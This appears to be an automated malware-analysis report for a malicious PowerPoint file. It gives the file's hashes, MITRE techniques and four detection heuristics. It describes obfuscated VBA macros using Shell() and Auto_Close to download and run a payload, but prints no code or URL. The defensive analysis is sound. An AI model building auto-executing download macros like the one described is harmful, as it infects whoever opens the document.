Malicious Office (OLE) / .PPT — malware analysis report

Static analysis result for SHA-256 7b68182ff4843b3f…

MALICIOUS

Office (OLE) / .PPT

68.5 KB Created: 2021-06-23 21:14:32 Authoring application: Microsoft Office PowerPoint
MD5: b3d0db80c67a9f2e23ee273aea645e29 SHA-1: 251aa8ecde2307c9f9167d89c1a89f8685b177d6 SHA-256: 7b68182ff4843b3fb20c299fa3e73fbf0f9a29bf28cad385e04dc756a20e444c
160 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 Command and Scripting Interpreter T1071.001 Application Layer Compromise

The file exhibits several characteristics of macro-based malware. The VBA macros, particularly the `Shell()` call and the `Auto_Close` macro, are commonly used to execute arbitrary code. The script attempts to download a payload from a URL, obfuscated with URL encoding, and then executes that payload using the `Shell()` function. The `Auto_Close` macro further increases the likelihood of delayed execution. The script's function names and variable names are deliberately obfuscated to evade detection.

Heuristics 4

  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas
e9d0c6fefdf4b0771ea74c55cdba35b5adb513805971983bff30d2868e67d782		 vba-macro oletools.olevba.extract_macros (decoded VBA source) 820 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.